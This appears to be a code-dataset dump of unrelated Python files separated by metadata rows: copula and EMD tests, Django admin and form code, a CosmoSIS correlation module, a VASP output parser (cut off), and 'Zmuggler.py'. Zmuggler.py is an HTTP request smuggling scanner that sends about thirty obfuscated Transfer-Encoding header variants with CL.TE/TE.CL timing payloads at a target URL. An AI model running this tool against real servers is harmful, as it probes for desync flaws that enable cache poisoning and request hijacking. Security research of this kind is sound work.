ourcov = [[1, rho], [rho, 1]]
ourcov2 = [[1, rho2], [rho2, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_array2 = np.random.multivariate_normal(ourmean, ourcov2, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
data_dict2 = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict2[dimkeys[i]] = data_array2[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
multigaussian2 = GaussianCopula(input_data=data_dict2, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
rank_data = multigaussian2.generates_U(10000)
diag(2).rank_histogram(rank_data, 20, multigaussian1)
class EMDTester(unittest.TestCase):
def test_different_comparison(self):
"""
This test compare the different comparison we can imagine between a empirical distribution and the uniform distribution
The EMD to the uniform distribution is difficult to compute so we represent the uniform distribution by a vector :
Either by generating a random sample on [0,1] : Y
Or with regular interval of length 1/n on [0,1] : Z
Or with regular smaller regular intervals of length 1/m in [0,1] ; A
:return: print the histograms of the emd found for each vector when we compute 1000 of this 3 EMD
"""
n = 10000
m = 100
H = np.zeros((1000, 3))
Z = np.asarray(range(n)) / n
A = np.zeros(n)
for i in range(m):
for j in range(int(n / m)):
A[i * n / m + j] = i / m
for k in range(1000):
X = np.random.rand(n)
Y = np.random.rand(n)
H[k][0] = emd_sort(U=X, V=Y)
H[k][1] = emd_sort(U=X, V=Z)
H[k][2]= emd_sort(U=X, V=A)
print(k)
count, bins, ignored = plt.hist(H, normed='True', label='Y', color='brk')
# EMD between X and Y will be in blue
# EMD between X and Z will be in red
# EMD between X and A will be in black
plt.legend(loc='upper right')
plt.plot(bins, np.ones_like(bins), linewidth=2, color='b')
plt.show()
def test_pyomo_with_sort(self):
n = 100
p=1
normal1 = np.random.randn(n)
normal2 = np.random.randn(n)
uniform1 = np.random.rand(n)
uniform2 = np.random.rand(n)
linearprog = np.asarray(range(n)) / n
U = linearprog
V = normal1
iter = []
for i in range(n):
for j in range(n):
iter.append((i, j))
print('Unsorted')
print('EMD sort')
tic()
print(emd_sort(U, V,p))
toc()
print('EMD pyomo')
tic()
print(emd_pyomo(U, V,p)[0])
toc()
print(' ')
print('EMD sort')
tic()
print(emd_sort(np.sort(U), np.sort(V),p))
toc()
print("sorted")
print('EMD pyomo')
tic()
print(emd_pyomo(np.sort(U),np.sort(V),p)[0])
toc()
def test_gaussian_copula(self):
#not finished yet
print("Warning test not finished yet")
n = 10000
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [2, 3]
ourmeandict = {"solar": 0, "wind": 0}
rho =0.1
rho2 = 0.9
ourcov = [[1, rho], [rho, 1]]
ourcov2 = [[1, rho2], [rho2, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_array2 = np.random.multivariate_normal(ourmean, ourcov2, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
data_dict2 = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict2[dimkeys[i]] = data_array2[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
multigaussian2 = GaussianCopula(input_data=data_dict2, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
print(emd_sort(data_array,data_array))
print(emd_sort(data_array2, data_array))
print(emd_sort(data_array2, data_array2))
#self.assertGreater(g, m)
#self.assertGreater(m, s)
if __name__ == '__main__':
i=0
for distr in ['empirical-copula']:
CopulaTester().test_plot(distr)
i=+1
print(i)
| 43.644366 | 134 | 0.61584 | 33,758 | 0.907839 | 0 | 0 | 0 | 0 | 0 | 0 | 4,999 | 0.134436 |
5fa27ee2e5dad2743d90292ecca26ad61a23a586 | 615 | py | Python | inbound/admin.py | nilesh-kr-dubey/django-inbound-rules | 5ca122bf915d17c04a63b1464048bba91006e854 | [
"MIT"
] | 1 | 2020-07-31T06:34:27.000Z | 2020-07-31T06:34:27.000Z | inbound/admin.py | nilesh-kr-dubey/django-inbound-rules | 5ca122bf915d17c04a63b1464048bba91006e854 | [
"MIT"
] | null | null | null | inbound/admin.py | nilesh-kr-dubey/django-inbound-rules | 5ca122bf915d17c04a63b1464048bba91006e854 | [
"MIT"
] | null | null | null | from django.contrib import admin
from inbound.models import Rule, InboundIP
# Register your models here.
class InboundIPInline(admin.TabularInline):
''' Inline of Inbound Rule '''
model = InboundIP
readonly_fields = ['cidr']
extra = 1
class RuleAdmin(admin.ModelAdmin):
model = Rule
list_display = ['name', 'namespace', 'url_name', 'group', 'allow_all', 'is_active', 'created']
exclude = ['alias', 'slug', 'extra']
list_filter = ['is_active', 'group', 'namespace', 'url_name']
raw_id_fields = ['group']
inlines = [InboundIPInline]
admin.site.register(Rule, RuleAdmin)
| 25.625 | 98 | 0.676423 | 464 | 0.754472 | 0 | 0 | 0 | 0 | 0 | 0 | 195 | 0.317073 |
5fa29ec1b9e32e73683aab09293ca2018836774b | 397 | py | Python | firldBuzzUserEntryApp/login/loginForm.py | sir-rasel/backend-api-integration | 41e3d44caa6ec10382efbb482cb9d0f77bd4a5fb | [
"MIT"
] | 2 | 2020-12-11T12:45:34.000Z | 2021-11-09T11:25:23.000Z | firldBuzzUserEntryApp/login/loginForm.py | sir-rasel/backend-api-integration | 41e3d44caa6ec10382efbb482cb9d0f77bd4a5fb | [
"MIT"
] | null | null | null | firldBuzzUserEntryApp/login/loginForm.py | sir-rasel/backend-api-integration | 41e3d44caa6ec10382efbb482cb9d0f77bd4a5fb | [
"MIT"
] | null | null | null | from django import forms
class LoginForm(forms.Form):
userName = forms.EmailField(label='User Name', max_length=55, required=True, \
widget=forms.EmailInput(attrs={'placeholder': 'Username that sends via mail'}))
password = forms.CharField(label='Password', max_length=55, required=True, \
widget=forms.PasswordInput(attrs={'placeholder': 'Password that send via mail'}))
| 49.625 | 89 | 0.722922 | 370 | 0.93199 | 0 | 0 | 0 | 0 | 0 | 0 | 106 | 0.267003 |
5fa32fa26545cc0a0f75090c1a789058c3f6ac3d | 751 | py | Python | src/level2/뉴스클러스터링.py | iml1111/programmers_coding_study | 07e89220c59c3b40dd92edc39d1b573d018efae4 | [
"MIT"
] | 1 | 2021-01-03T13:01:33.000Z | 2021-01-03T13:01:33.000Z | src/level2/뉴스클러스터링.py | iml1111/programmers_coding_study | 07e89220c59c3b40dd92edc39d1b573d018efae4 | [
"MIT"
] | null | null | null | src/level2/뉴스클러스터링.py | iml1111/programmers_coding_study | 07e89220c59c3b40dd92edc39d1b573d018efae4 | [
"MIT"
] | null | null | null | from collections import Counter
def refine(s):
result = []
for i in range(len(s) - 1):
bigram = s[i:i+2].lower()
if bigram.isalpha():
result.append(bigram)
return result
def solution(str1, str2):
counter1, counter2 = Counter(refine(str1)), Counter(refine(str2))
set1, set2 = set([i for i in counter1]), set([i for i in counter2])
a_point = sum([min(counter1[idx], counter2[idx]) for idx in set1 & set2])
b_point = sum([max(counter1[idx], counter2[idx]) for idx in set1 | set2])
if a_point == b_point:
return 65536
else:
return int(a_point / b_point * 65536)
if __name__ == '__main__':
#print(solution("FRANCE", "french"))
print(solution("E=M*C^2", "e=m*c^2")) | 31.291667 | 77 | 0.609854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 64 | 0.08522 |
5fa6b75aa0e33eeec7402b44584c8450dcb054c7 | 1,226 | py | Python | gssClients/gssPythonClients/download_gss.py | SemWES/client_libs | 48c3af519ceaf80b3f33cf509c72376b9b3d9582 | [
"Zlib"
] | null | null | null | gssClients/gssPythonClients/download_gss.py | SemWES/client_libs | 48c3af519ceaf80b3f33cf509c72376b9b3d9582 | [
"Zlib"
] | null | null | null | gssClients/gssPythonClients/download_gss.py | SemWES/client_libs | 48c3af519ceaf80b3f33cf509c72376b9b3d9582 | [
"Zlib"
] | null | null | null | #!/bin/env python
# Copyright STIFTELSEN SINTEF 2016
import suds
import urllib2
import sys
if len(sys.argv) < 4:
print ("Usage:")
print ("\t %s gss-url outputfilename token" % sys.argv[0])
exit()
# get url:
url = sys.argv[1]
outputfileName = sys.argv[2]
sessionToken = sys.argv[3]
wsdlLocation = "https://api.caxman.eu/sintef/infrastructure/gss-0.1/FileUtilities?wsdl"
client = suds.client.Client(wsdlLocation)
resourceInformation = client.service.getResourceInformation(url, sessionToken)
readDescription = resourceInformation.readDescription
if readDescription.supported:
headers = {}
headers[readDescription.sessionTokenField] = sessionToken
if hasattr(readDescription, "headers"):
for headerField in readDescription.headers:
headers[headerField.key] = headerField.value
with open(outputfileName, "wb") as outputFile:
request = urllib2.Request(url = readDescription.url, headers=headers)
result = urllib2.urlopen(request)
while True:
buffer = result.read()
if not buffer:
break
outputFile.write(buffer)
else:
print "The given gss_url does not support read/download."
| 29.190476 | 88 | 0.686786 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 242 | 0.19739 |
5faad04658ea51684534a077173c5f03481fc86f | 6,728 | py | Python | Zmuggler.py | electronicbots/Zmuggler | 5b9df5919367dffb588b18c5acd567e20135d2b7 | [
"MIT"
] | 1 | 2021-07-28T06:02:44.000Z | 2021-07-28T06:02:44.000Z | Zmuggler.py | electronicbots/Zmuggler | 5b9df5919367dffb588b18c5acd567e20135d2b7 | [
"MIT"
] | null | null | null | Zmuggler.py | electronicbots/Zmuggler | 5b9df5919367dffb588b18c5acd567e20135d2b7 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from requests import Request, Session
from requests.exceptions import ReadTimeout
import urllib3, requests, collections, http.client, optparse, sys, os
print("""\033[1;36m
_____ _
|__ /_ __ ___ _ _ __ _ __ _| | ___ _ __
/ /| '_ ` _ \| | | |/ _` |/ _` | |/ _ \ '__|
/ /_| | | | | | |_| | (_| | (_| | | __/ |
/____|_| |_| |_|\__,_|\__, |\__, |_|\___|_|
|___/ |___/
| Zmuggler |
| @electronicbots |
\033[1;m""")
http.client._header_name = lambda x: True
http.client._header_value = lambda x: False
urllib3.disable_warnings()
class ZSmuggler():
def __init__(self, url):
self.url = url
self.pheaders = []
self.rheaders = []
def genHeaders(self):
transfer_encoding = list(
[
["Transfer-Encoding", "chunked"],
["Transfer-Encoding ", "chunked"],
["Transfer_Encoding", "chunked"],
["Transfer Encoding", "chunked"],
[" Transfer-Encoding", "chunked"],
["Transfer-Encoding", " chunked"],
["Transfer-Encoding", "chunked"],
["Transfer-Encoding", "\tchunked"],
["Transfer-Encoding", "\u000Bchunked"],
["Content-Encoding", " chunked"],
["Transfer-Encoding", "\n chunked"],
["Transfer-Encoding\n ", " chunked"],
["Transfer-Encoding", " \"chunked\""],
["Transfer-Encoding", " 'chunked'"],
["Transfer-Encoding", " \n\u000Bchunked"],
["Transfer-Encoding", " \n\tchunked"],
["Transfer-Encoding", " chunked, cow"],
["Transfer-Encoding", " cow, "],
["Transfer-Encoding", " chunked\r\nTransfer-encoding: cow"],
["Transfer-Encoding", " chunk"],
["Transfer-Encoding", " cHuNkeD"],
["TrAnSFer-EnCODinG", " cHuNkeD"],
["Transfer-Encoding", " CHUNKED"],
["TRANSFER-ENCODING", " CHUNKED"],
["Transfer-Encoding", " chunked\r"],
["Transfer-Encoding", " chunked\t"],
["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
["Transfer\r-Encoding", " chunked"],
["barn\n\nTransfer-Encoding", " chunked"],
])
for x in transfer_encoding:
headers = collections.OrderedDict()
headers[x[0]] = x[1]
headers['Cache-Control'] = "no-cache"
headers['Content-Type'] = "application/x-www-form-urlencoded"
headers['User-Agent'] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
self.pheaders.append(headers)
def resptime(self, headers={}, payload=""):
s = Session()
req = Request('POST', self.url, data=payload)
prepped = req.prepare()
prepped.headers = headers
resp_time = 0
try:
resp = s.send(prepped, verify=False, timeout=10)
resp_time = resp.elapsed.total_seconds()
except Exception as e:
if isinstance(e, ReadTimeout):
resp_time = 10
return resp_time
def calcT(self, L_Bigtime, P_Bigtime, L_Smalltime, P_Smalltime):
for headers in self.pheaders:
headers['Content-Length'] = L_Bigtime
big_time = self.resptime(headers, P_Bigtime)
if not big_time:
big_time = 0
if big_time < 5:
continue
headers['Content-Length'] = L_Smalltime
small_time = self.resptime(headers, P_Smalltime)
if not small_time:
small_time = 1
if big_time > 5 and big_time / small_time >= 5:
self.valid = True
self.type = "CL-TE"
self.rheaders = [headers]
return True
return False
def Bcheck(self):
header = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
}
try:
resp = requests.get(self.url, headers=header, verify=False, timeout=10)
if resp.status_code == 200:
return True
else:
return False
except Exception as error:
print(error)
def checkCLTE(self):
result = self.calcT(4, "1\r\nA\r\nS\r\n\r\n\r\n", 11, "1\r\nA\r\nS\r\n\r\n\r\n")
return result
def checkTECL(self):
result = self.calcT(6, "0\r\n\r\nX", 5, "0\r\n\r\n")
return result
def expl0it(self):
if self.Bcheck():
self.genHeaders()
try:
result = self.checkCLTE()
flag = "CLTE"
if not result:
result = self.checkTECL()
flag = "TECL"
if result:
print("\033[1;31m" + "\033[1;m\033[1;32m[+] Found possible " + flag)
self.recheck(flag)
except Exception as e:
print(e)
print("timeout: " + self.url)
else:
print('\033[1;31m' + "[-] can't access target" + '\033[1;m')
def recheck(self, flag):
print("[+] Checking again...")
result = False
if flag == "CLTE":
result = self.checkCLTE()
if flag == "TECL":
result = self.checkTECL()
if result:
payloadkey = list(self.rheaders[0])[0]
payloadV = self.rheaders[0][payloadkey]
payload = str([payloadkey, payloadV])
print(flag, payload)
def Main():
arguments = Args()
if '--target' in str(sys.argv):
target = (arguments.filepath)
hrs = ZSmuggler(target)
hrs.expl0it()
else:
print("Try ./Zmuggler.py --help")
def Args():
Parser = optparse.OptionParser()
group = optparse.OptionGroup(Parser, "Grouped arguments")
group.add_option('--target' , dest='link', help = 'target URL')
Parser.add_option_group(group)
(arguments, values) = Parser.parse_args()
return arguments
if __name__ == '__main__':
arguments = Args()
if '--target' in str(sys.argv):
target = (arguments.link)
hrs = ZSmuggler(target)
hrs.expl0it()
else:
print("Try ./Zmuggler.py --help")
| 35.597884 | 148 | 0.5 | 5,492 | 0.81629 | 0 | 0 | 0 | 0 | 0 | 0 | 2,137 | 0.317628 |
5faed7df0481d882b8814038712e8be58ef77e17 | 3,397 | py | Python | cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-09-15T10:10:26.000Z | 2021-09-15T10:10:26.000Z | cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | null | null | null | cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-06-11T15:29:43.000Z | 2021-06-11T15:29:43.000Z | #coding: utf-8
#import cl_to_xi_full
from __future__ import print_function
from builtins import range
import numpy as np
from cosmosis.datablock import option_section, names as section_names
from cl_to_xi import save_xi_00_02, save_xi_22, arcmin_to_radians, SpectrumInterp
from legendre import get_legfactors_00, get_legfactors_02, precomp_GpGm
def setup(options):
if options.has_value(option_section, "theta"):
theta = options[option_section, 'theta']
if np.isscalar(theta):
theta = np.array([theta])
theta = arcmin_to_radians(theta)
else:
n_theta = options[option_section, "n_theta"]
theta_min = options[option_section, "theta_min"]
theta_max = options[option_section, "theta_max"]
theta_min = arcmin_to_radians(theta_min)
theta_max = arcmin_to_radians(theta_max)
theta = np.logspace(np.log10(theta_min), np.log10(theta_max), n_theta)
corr_type = options.get_int(option_section, 'corr_type')
ell_max = options.get_int(option_section, "ell_max")
cl_section = options.get_string(option_section, "input_section_name", "")
output_section = options.get_string(
option_section, "output_section_name", "")
# setup precompute functions and I/O sections
if corr_type == 0:
precomp_func = precomp_GpGm
cl_to_xi_func = save_xi_22
if not cl_section:
cl_section = "shear_cl"
if not output_section:
output_section = "shear_xi"
elif corr_type == 1:
precomp_func = get_legfactors_00
cl_to_xi_func = save_xi_00_02
if not cl_section:
cl_section = "galaxy_cl"
if not output_section:
output_section = "galaxy_xi"
elif corr_type == 2:
precomp_func = get_legfactors_02
cl_to_xi_func = save_xi_00_02
if not cl_section:
cl_section = "galaxy_shear_cl"
if not output_section:
output_section = "galaxy_shear_xi"
else:
print("corr_type should be 0 (for spin 2 autocorrelations e.g. xi+/-(theta)),")
print("1 (for scalar autocorrelations e.g. w(theta) or 2")
print("for spin 0 x spin 2 correlations e.g. gamma_t(theta)")
raise ValueError()
legfacs = precomp_func(np.arange(ell_max + 1), theta)
return theta, ell_max, legfacs, cl_to_xi_func, cl_section, output_section
def execute(block, config):
thetas, ell_max, legfacs, cl_to_xi_func, cl_section, output_section = config
n_theta = len(thetas)
ell = block[cl_section, "ell"]
nbina, nbinb = block[cl_section, 'nbin_a'], block[cl_section, 'nbin_b']
block[output_section, "nbin_a"] = nbina
block[output_section, "nbin_b"] = nbinb
block[output_section, "theta"] = thetas
#block.put_metadata(output_section, "theta", "unit", "radians")
for i in range(1, nbina + 1):
for j in range(1, nbinb + 1):
name = 'bin_%d_%d' % (i, j)
if block.has_value(cl_section, name):
c_ell = block[cl_section, name]
else:
continue
cl_interp = SpectrumInterp(ell, c_ell)
cl_to_xi_func(block, output_section, i, j,
cl_interp, thetas, legfacs)
return 0
def cleanup(config):
# nothing to do here! We just include this
# for completeness. The joy of python.
return 0
| 36.138298 | 87 | 0.657345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 643 | 0.189285 |
5fafc8dcb4215c91fc9ae3f825e9c6da430bff4a | 326 | py | Python | software/glasgow/applet/video/__init__.py | electroniceel/Glasgow | f6d8fda1d5baec006a6c43fa3d2547a33bdee666 | [
"Apache-2.0",
"0BSD"
] | 1,014 | 2019-10-05T16:21:43.000Z | 2022-03-31T09:26:43.000Z | software/glasgow/applet/video/__init__.py | attie/glasgow | eca2cb278478d9cb9a102e6e99dfc5bd2d77a549 | [
"Apache-2.0",
"0BSD"
] | 113 | 2019-10-06T07:49:37.000Z | 2022-03-24T04:33:08.000Z | software/glasgow/applet/video/__init__.py | attie/glasgow | eca2cb278478d9cb9a102e6e99dfc5bd2d77a549 | [
"Apache-2.0",
"0BSD"
] | 79 | 2019-10-08T07:36:03.000Z | 2022-03-21T07:00:27.000Z | """
The ``video`` taxon groups applets implementing video interfaces, that is, interfaces for periodic
transfers of 2d arrays of samples of electromagnetic wave properties.
Examples: VGA output, TFT LCD capture, TFT LCD output.
Counterexamples: SCSI scanner (use taxon ``photo``), SPI LCD output (use taxon ``display``).
"""
| 40.75 | 98 | 0.757669 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 325 | 0.996933 |
5fb11bba5257814c53fdaf00b36feffb7caef7ad | 22,329 | py | Python | aiida_vasp/parsers/content_parsers/vasprun.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | 3 | 2016-11-18T07:19:57.000Z | 2016-11-28T08:28:38.000Z | aiida_vasp/parsers/content_parsers/vasprun.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | null | null | null | aiida_vasp/parsers/content_parsers/vasprun.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | null | null | null | """
The vasprun.xml parser interface.
---------------------------------
Contains the parsing interfaces to ``parsevasp`` used to parse ``vasprun.xml`` content.
"""
# pylint: disable=abstract-method, too-many-public-methods
import numpy as np
from parsevasp.vasprun import Xml
from parsevasp import constants as parsevaspct
from aiida_vasp.parsers.content_parsers.base import BaseFileParser
from aiida_vasp.utils.compare_bands import get_band_properties
class VasprunParser(BaseFileParser):
"""The parser interface that enables parsing of ``vasprun.xml`` content.
The parser is triggered by using the keys listed in ``PARSABLE_QUANTITIES``.
"""
OPEN_MODE = 'rb'
DEFAULT_SETTINGS = {
'quantities_to_parse': [
'structure',
'eigenvalues',
'dos',
'kpoints',
'occupancies',
'trajectory',
'energies',
'projectors',
'dielectrics',
'born_charges',
'hessian',
'dynmat',
'forces',
'stress',
'total_energies',
'maximum_force',
'maximum_stress',
'band_properties',
'version',
],
'energy_type': ['energy_extrapolated'],
'electronic_step_energies': False
}
PARSABLE_QUANTITIES = {
'structure': {
'inputs': [],
'name': 'structure',
'prerequisites': [],
'alternatives': ['poscar-structure']
},
'eigenvalues': {
'inputs': [],
'name': 'eigenvalues',
'prerequisites': [],
'alternatives': ['eigenval-eigenvalues']
},
'dos': {
'inputs': [],
'name': 'dos',
'prerequisites': [],
'alternatives': ['doscar-dos']
},
'kpoints': {
'inputs': [],
'name': 'kpoints',
'prerequisites': [],
'alternatives': ['kpoints-kpoints']
},
'occupancies': {
'inputs': [],
'name': 'occupancies',
'prerequisites': [],
},
'trajectory': {
'inputs': [],
'name': 'trajectory',
'prerequisites': [],
},
'energies': {
'inputs': [],
'name': 'energies',
'prerequisites': [],
},
'total_energies': {
'inputs': [],
'name': 'total_energies',
'prerequisites': [],
},
'projectors': {
'inputs': [],
'name': 'projectors',
'prerequisites': [],
},
'dielectrics': {
'inputs': [],
'name': 'dielectrics',
'prerequisites': [],
},
'stress': {
'inputs': [],
'name': 'stress',
'prerequisites': [],
},
'forces': {
'inputs': [],
'name': 'forces',
'prerequisites': [],
},
'born_charges': {
'inputs': [],
'name': 'born_charges',
'prerequisites': [],
},
'hessian': {
'inputs': [],
'name': 'hessian',
'prerequisites': [],
},
'dynmat': {
'inputs': [],
'name': 'dynmat',
'prerequisites': [],
},
'fermi_level': {
'inputs': [],
'name': 'fermi_level',
'prerequisites': [],
},
'maximum_force': {
'inputs': [],
'name': 'maximum_force',
'prerequisites': []
},
'maximum_stress': {
'inputs': [],
'name': 'maximum_stress',
'prerequisites': []
},
'band_properties': {
'inputs': [],
'name': 'band_properties',
'prerequisites': [],
},
'version': {
'inputs': [],
'name': 'version',
'prerequisites': [],
}
}
# Mapping of the energy names to those returned by parsevasp.vasprunl.Xml
ENERGY_MAPPING = {
'energy_extrapolated': 'energy_extrapolated_final',
'energy_free': 'energy_free_final',
'energy_no_entropy': 'energy_no_entropy_final',
'energy_extrapolated_electronic': 'energy_extrapolated',
'energy_free_electronic': 'energy_free',
'energy_no_entropy_electronic': 'energy_no_entropy',
}
ENERGY_MAPPING_VASP5 = {
'energy_extrapolated': 'energy_no_entropy_final',
'energy_free': 'energy_free_final',
# Not that energy_extrapolated_final parsed is the entropy term
'energy_no_entropy': 'energy_extrapolated_final',
'energy_extrapolated_electronic': 'energy_extrapolated',
'energy_free_electronic': 'energy_free',
'energy_no_entropy_electronic': 'energy_no_entropy',
}
def _init_from_handler(self, handler):
"""Initialize using a file like handler."""
try:
self._content_parser = Xml(file_handler=handler, k_before_band=True, logger=self._logger)
except SystemExit:
self._logger.warning('Parsevasp exited abnormally.')
@property
def version(self):
"""Fetch the VASP version from ``parsevasp`` and return it as a string object."""
# fetch version
version = self._content_parser.get_version()
if version is None:
return None
return version
@property
def eigenvalues(self):
"""Fetch eigenvalues."""
# Fetch eigenvalues
eigenvalues = self._content_parser.get_eigenvalues()
if eigenvalues is None:
return None
return eigenvalues
@property
def occupancies(self):
"""Fetch occupancies."""
# Fetch occupancies
occupancies = self._content_parser.get_occupancies()
if occupancies is None:
# occupancies not present, should not really happen?
return None
return occupancies
@property
def kpoints(self):
"""Fetch the kpoints an prepare for consumption by the NodeComposer."""
kpts = self._content_parser.get_kpoints()
kptsw = self._content_parser.get_kpointsw()
# k-points in XML is always in reciprocal if spacing methods have been used
# but what about explicit/regular
cartesian = False
kpoints_data = None
if (kpts is not None) and (kptsw is not None):
# Create a dictionary and store k-points that can be consumed by the NodeComposer
kpoints_data = {}
kpoints_data['mode'] = 'explicit'
kpoints_data['cartesian'] = cartesian
kpoints_data['points'] = kpts
kpoints_data['weights'] = kptsw
return kpoints_data
@property
def structure(self):
"""
Fetch a given structure.
Which structure to fetch is controlled by inputs.
eFL: Need to clean this so that we can set different
structures to pull from the outside. Could be usefull not
pulling the whole trajectory.
Currently defaults to the last structure.
"""
return self.last_structure
@property
def last_structure(self):
"""
Fetch the structure.
After or at the last recorded ionic step.
"""
last_lattice = self._content_parser.get_lattice('last')
if last_lattice is None:
return None
return _build_structure(last_lattice)
@property
def final_structure(self):
"""
Fetch the structure.
After or at the last recorded ionic step. Should in
principle be the same as the method above.
"""
return self.last_structure
@property
def last_forces(self):
"""
Fetch forces.
After or at the last recorded ionic step.
"""
force = self._content_parser.get_forces('last')
return force
@property
def final_forces(self):
"""
Fetch forces.
After or at the last recorded ionic step.
"""
return self.last_forces
@property
def forces(self):
"""
Fetch forces.
This container should contain all relevant forces.
Currently, it only contains the final forces, which can be obtain
by the id `final_forces`.
"""
final_forces = self.final_forces
forces = {'final': final_forces}
return forces
@property
def maximum_force(self):
"""Fetch the maximum force of at the last ionic run."""
forces = self.final_forces
if forces is None:
return None
norm = np.linalg.norm(forces, axis=1)
return np.amax(np.abs(norm))
@property
def last_stress(self):
"""
Fetch stess.
After or at the last recorded ionic step.
"""
stress = self._content_parser.get_stress('last')
return stress
@property
def final_stress(self):
"""
Fetch stress.
After or at the last recorded ionic step.
"""
return self.last_stress
@property
def stress(self):
"""
Fetch stress.
This container should contain all relevant stress.
Currently, it only contains the final stress, which can be obtain
by the id `final_stress`.
"""
final_stress = self.final_stress
stress = {'final': final_stress}
return stress
@property
def maximum_stress(self):
"""Fetch the maximum stress of at the last ionic run."""
stress = self.final_stress
if stress is None:
return None
norm = np.linalg.norm(stress, axis=1)
return np.amax(np.abs(norm))
@property
def trajectory(self):
"""
Fetch unitcells, positions, species, forces and stress.
For all calculation steps.
"""
unitcell = self._content_parser.get_unitcell('all')
positions = self._content_parser.get_positions('all')
species = self._content_parser.get_species()
forces = self._content_parser.get_forces('all')
stress = self._content_parser.get_stress('all')
# make sure all are sorted, first to last calculation
# (species is constant)
unitcell = sorted(unitcell.items())
positions = sorted(positions.items())
forces = sorted(forces.items())
stress = sorted(stress.items())
# convert to numpy
unitcell = np.asarray([item[1] for item in unitcell])
positions = np.asarray([item[1] for item in positions])
forces = np.asarray([item[1] for item in forces])
stress = np.asarray([item[1] for item in stress])
# Aiida wants the species as symbols, so invert
elements = _invert_dict(parsevaspct.elements)
symbols = np.asarray([elements[item].title() for item in species.tolist()])
if (unitcell is not None) and (positions is not None) and \
(species is not None) and (forces is not None) and \
(stress is not None):
trajectory_data = {}
keys = ('cells', 'positions', 'symbols', 'forces', 'stress', 'steps')
stepids = np.arange(unitcell.shape[0])
for key, data in zip(keys, (unitcell, positions, symbols, forces, stress, stepids)):
trajectory_data[key] = data
return trajectory_data
return None
@property
def total_energies(self):
"""Fetch the total energies after the last ionic run."""
energies = self.energies
if energies is None:
return None
energies_dict = {}
for etype in self._settings.get('energy_type', self.DEFAULT_SETTINGS['energy_type']):
energies_dict[etype] = energies[etype][-1]
# Also return the raw electronic steps energy
energies_dict[etype + '_electronic'] = energies[etype + '_electronic'][-1]
return energies_dict
@property
def energies(self):
"""Fetch the total energies."""
# Check if we want total energy entries for each electronic step.
electronic_step_energies = self._settings.get('electronic_step_energies', self.DEFAULT_SETTINGS['electronic_step_energies'])
return self._energies(nosc=not electronic_step_energies)
def _energies(self, nosc):
"""
Fetch the total energies for all energy types, calculations (ionic steps) and electronic steps.
The returned dict from the parser contains the total energy types as a key (plus the _final, which is
the final total energy ejected by VASP after the closure of the electronic steps). The energies can then
be found in the flattened ndarray where the key `electronic_steps` indicate how many electronic steps
there is per ionic step. Using the combination, one can rebuild the electronic step energy per ionic step etc.
Because the VASPrun parser returns both the electronic step energies (at the end of each cycles) and the ionic step
energies (_final), we apply a mapping to recovery the naming such that the ionic step energies do not have the suffix,
but the electronic step energies do.
"""
etype = self._settings.get('energy_type', self.DEFAULT_SETTINGS['energy_type'])
# Create a copy
etype = list(etype)
etype_orig = list(etype)
# Apply mapping and request the correct energies from the parsing results
# VASP 5 has a bug where the energy_no_entropy is not included in the XML output - we have to calculate it here
if self.version.startswith('5'):
# For energy_no_entropy needs to be calculated here
if 'energy_no_entropy' in etype_orig:
etype.append('energy_free')
etype.append('energy_extrapolated')
# energy extrapolated is stored as energy_no_entropy for the ionic steps
if 'energy_extrapolated' in etype_orig:
etype.append('energy_no_entropy')
# Remove duplicates
etype = list(set(etype))
energies = self._content_parser.get_energies(status='all', etype=etype, nosc=nosc)
# Here we must calculate the true `energy_no_entropy`
if 'energy_no_entropy' in etype_orig:
# The energy_extrapolated_final is the entropy term itself in VASP 5
# Store the calculated energy_no_entropy under 'energy_extrapolated_final',
# which is then recovered as `energy_no_entropy` later
energies['energy_extrapolated_final'] = energies['energy_free_final'] - energies['energy_extrapolated_final']
